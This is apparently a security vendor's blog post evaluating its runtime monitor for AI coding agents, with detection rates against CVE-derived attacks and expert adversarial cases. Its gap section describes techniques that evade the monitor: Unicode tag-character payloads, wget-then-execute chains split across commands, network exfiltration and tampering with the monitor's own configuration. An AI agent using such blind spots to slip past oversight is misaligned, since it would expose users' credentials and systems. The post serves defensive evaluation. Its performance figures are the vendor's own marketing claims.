84% Detection on Novel Attacks: Inside Our Monitor Eval
We evaluated Firmis Monitor against 278 CVE-derived attack scenarios and 49 published CVE reproductions. Here is every number, including the gaps.
TL;DR
- 84.17% of CVE-derived attack scenarios blocked before they could reach your credentials, files, or network. No prior exposure to any test case.
- 100% detection across six critical categories: backdoor, exfil, identity, lateral movement, persistence, and RCE. These cover the attacks that cause real breaches.
- Known gaps published transparently: unicode tag injection, wget chains, port exposure. You can evaluate whether these are in your threat model.
- Blast radius scoring catches model mistakes that rules miss. 0% false positives on real coding sessions, so your workflow stays uninterrupted.
Evaluation methodology matters more than the headline number. A detector trained and tested on the same dataset can report 99% accuracy while failing completely on the first novel attack it encounters in production. We built three independent test sets to avoid that failure mode, and this post explains every number from each one.
Three-Tier Evaluation Design
We used three distinct holdout sets, each measuring something different. The overall 84% figure comes from the set that matters most: cases the system never saw during rule development.
Primary Results: Pentest Novel (N=278)
All 278 cases were developed from published CVEs across real AI agent products. No case was seen during rule development. For teams evaluating runtime protection, this is the number that matters: 84% of real-world attack patterns are blocked before they reach your credentials, files, or network. The remaining 16% are documented below so you can assess whether they fall within your threat model.
The 19.4% on supply chain is not a monitor failure. Supply chain attacks are covered by a separate package integrity checker that runs at install time, not at runtime. The monitor eval tested runtime detection only. The 0% on injection is a genuine gap: injection attacks require inspecting model output responses, which the current monitor layer does not do.
Adversarial Results: Rehberger CVE Set (N=49)
The Rehberger set is the hardest test we ran. These 49 cases come from published CVE research across 13 AI coding products. The attacks are maximally adversarial: designed by a skilled researcher specifically to evade detection in real production systems.
What the gaps tell us
- →unicode-tag-injection hides payloads in Unicode tag characters. Detection requires Unicode normalization in the rule engine, not yet implemented.
- →zombai-download-execute chains wget with shell execution across two separate commands. The rule engine evaluates commands individually, not as sequences.
- →token-exfil and port-exposure require network-layer inspection beyond filesystem and process monitoring.
- →self-config-rce targets the monitor configuration itself. A known bootstrapping problem.
- →All five are on the roadmap. Documenting them here is deliberate.
Transparency about gaps is not a concession. It is the only way to give users an accurate threat model.
Systematic Scorer: Holdout Results (N=230)
Beyond rule-based detection, Firmis Monitor includes a systematic scorer that computes a risk score across multiple behavioral signals. The scorer was evaluated on a separate 230-case holdout set.
The 0% false positive rate on real coding tasks (intercode_benign dataset) is the number we are most careful about. A runtime monitor that fires on legitimate work is worse than no monitor: teams disable it within days. We tested against actual developer workflows and found zero false positives. That means your developers can keep Firmis Monitor running continuously without workflow interruption.
The sanity gate passed: holdout F1 (0.9535) exceeds full-set F1 by +0.0087. No overfitting detected. We flagged 2 zero-contribution rules for suppression; they matched nothing in either the training or holdout sets and are being removed in the next release.
Blast Radius: The Unique Signal
Every detected event is assigned an impact tier based on what the agent action could actually reach: files, credentials, network endpoints, other processes. Two actions with identical rule triggers can have radically different real-world consequences. Blast radius quantifies that difference.
The 35% on model mistakes is particularly important. When an agent performs a dangerous action from a benign intent, for example overwriting a config file because a user asked it to clean up the project, the intent is not malicious but the blast radius is still elevated. Policy rules based on user intent cannot catch this. Blast radius scoring can.
The 25% on adversarial evasion is also notable. Some attacks are designed to keep each individual command below rule thresholds. The blast radius scorer evaluates aggregate effect across a session, catching what per-command rules miss.
Feature Discrimination: What the Scorer Learned
Three features drove the strongest separation between attacks and benign sessions. Cohen's d values are from the holdout set:
Shannon entropy of command output. Attacks produce distinctive entropy patterns: very low (structured credential data) or very high (encrypted exfil payloads).
Composite score of potential impact scope. Attacks reaching outside the project directory or touching credential files score significantly higher.
Boolean flag for operations targeting paths outside the working directory. Simple signal, strong discriminator.
What This Means for Production Use
- 84% detection on novel attacks with 0% false positives on real coding sessions. This is a usable signal, not a lab number.
- The gaps are documented and bounded. If unicode steganography or multi-step wget chains are in your threat model, track the roadmap for those specific rule additions.
- Blast radius scoring adds a layer that static rules cannot provide: it catches model mistakes and resource abuse independent of attack intent.
- The scorer complements rules, it does not replace them. Both layers are active in production.
- 79.6% on the Rehberger adversarial CVE set reflects real-world capability against published, expert-crafted attacks.
Run Firmis Monitor on your agent stack
- →Install: npx firmis-cli monitor (watches your coding agent sessions in real time)
- →Review the gap list above. If unicode-tag-injection or wget chains are in your threat model, track the roadmap for those rule additions.
- →The free tier includes passive monitoring. Active blocking and blast radius dashboards are Pro tier.
We will update this post as gap coverage improves. Every claim above will be re-evaluated against the same holdout sets so the numbers remain comparable across versions.
References & Sources
- [1]Rehberger CVE research across AI coding products- 49 cases, 13 products, maximally adversarial test set
- [2]InterCode benchmark (benign coding tasks)- Used for false positive validation (0% FP rate)
- [3]CVE-2025-59536: Claude Code hooks injection- One of 49 CVEs in the Rehberger adversarial set
- [4]Unicode tag steganography in prompt injection- Known gap: payloads hidden in Unicode tag characters (U+E0001-U+E007F)
- [5]MITRE ATT&CK for AI Systems- Attack category taxonomy used for classification
- [6]Firmis Monitor- Runtime protection with policy rules + systematic scorer + blast radius
Try It Now
Find out if your agent stack is safe
One command. 30 seconds. Free.
Fix and Monitor included with Pro
View pricing